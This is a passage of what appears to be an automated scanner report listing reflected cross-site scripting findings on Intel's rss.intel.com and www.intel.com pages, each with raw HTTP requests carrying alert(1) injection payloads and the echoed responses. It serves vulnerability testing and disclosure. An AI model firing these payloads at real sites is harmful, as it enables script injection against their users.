This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011df855"style%3d"x%3aexpression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011df855"style="x:expression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011df855"style="x:expression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.87. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 8]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5460e"style%3d"x%3aexpression(alert(1))"ca2cafebd5e was submitted in the REST URL parameter 8. This input was echoed as 5460e"style="x:expression(alert(1))"ca2cafebd5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style%3d"x%3aexpression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style="x:expression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style="x:expression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.88. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 9]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8580"style%3d"x%3aexpression(alert(1))"1d378863169 was submitted in the REST URL parameter 9. This input was echoed as a8580"style="x:expression(alert(1))"1d378863169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style%3d"x%3aexpression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style="x:expression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style="x:expression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102">
...[SNIP]...

4.89. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 10]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbebe"style%3d"x%3aexpression(alert(1))"66fe35fec0d was submitted in the REST URL parameter 10. This input was echoed as bbebe"style="x:expression(alert(1))"66fe35fec0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style%3d"x%3aexpression(alert(1))"66fe35fec0d HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:42 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style="x:expression(alert(1))"66fe35fec0d?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style="x:expression(alert(1))"66fe35fec0d?cid=rss-258152-c1-264131">
...[SNIP]...

4.90. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccbda"style%3d"x%3aexpression(alert(1))"cd785807712 was submitted in the REST URL parameter 2. This input was echoed as ccbda"style="x:expression(alert(1))"cd785807712 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131ccbda"style%3d"x%3aexpression(alert(1))"cd785807712/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131ccbda"style="x:expression(alert(1))"cd785807712
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131ccbda"style="x:expression(alert(1))"cd785807712">
...[SNIP]...

4.91. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa199"style%3d"x%3aexpression(alert(1))"23b41b411a was submitted in the REST URL parameter 3. This input was echoed as aa199"style="x:expression(alert(1))"23b41b411a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.comaa199"style%3d"x%3aexpression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.comaa199"style="x:expression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours
Content-Length: 228
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.comaa199"style="x:expression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours">
...[SNIP]...

4.92. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8c1"style%3d"x%3aexpression(alert(1))"fc79ab44046 was submitted in the REST URL parameter 4. This input was echoed as fe8c1"style="x:expression(alert(1))"fc79ab44046 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/communityfe8c1"style%3d"x%3aexpression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:14 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/communityfe8c1"style="x:expression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communityfe8c1"style="x:expression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.93. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc99"style%3d"x%3aexpression(alert(1))"562e67141d2 was submitted in the REST URL parameter 5. This input was echoed as acc99"style="x:expression(alert(1))"562e67141d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroomacc99"style%3d"x%3aexpression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomacc99"style="x:expression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomacc99"style="x:expression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.94. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b96e"style%3d"x%3aexpression(alert(1))"93e07c87b37 was submitted in the REST URL parameter 6. This input was echoed as 4b96e"style="x:expression(alert(1))"93e07c87b37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog4b96e"style%3d"x%3aexpression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog4b96e"style="x:expression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog4b96e"style="x:expression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.95. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 7]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18bf7"style%3d"x%3aexpression(alert(1))"f7271d816f7 was submitted in the REST URL parameter 7. This input was echoed as 18bf7"style="x:expression(alert(1))"f7271d816f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style%3d"x%3aexpression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style="x:expression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style="x:expression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.96. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 8]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d6b"style%3d"x%3aexpression(alert(1))"911c05b74a9 was submitted in the REST URL parameter 8. This input was echoed as 26d6b"style="x:expression(alert(1))"911c05b74a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style%3d"x%3aexpression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style="x:expression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style="x:expression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.97. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 9]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8768c"style%3d"x%3aexpression(alert(1))"82ed80d4031 was submitted in the REST URL parameter 9. This input was echoed as 8768c"style="x:expression(alert(1))"82ed80d4031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style%3d"x%3aexpression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style="x:expression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131
Content-Length: 254
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style="x:expression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131">
...[SNIP]...

4.98. http://www.intel.com/pressroom/index.htm [iid parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/index.htm

Issue detail

The value of the iid request parameter is copied into the HTML document as plain text between tags. The payload 97bc3<script>alert(1)</script>00808251755 was submitted in the iid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pressroom/index.htm?iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755 HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://newsroom.intel.com/index.jspa?iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755
Content-Length: 69
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:33 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=CDELKMPAGGGMGBKHKJPMODBH; path=/

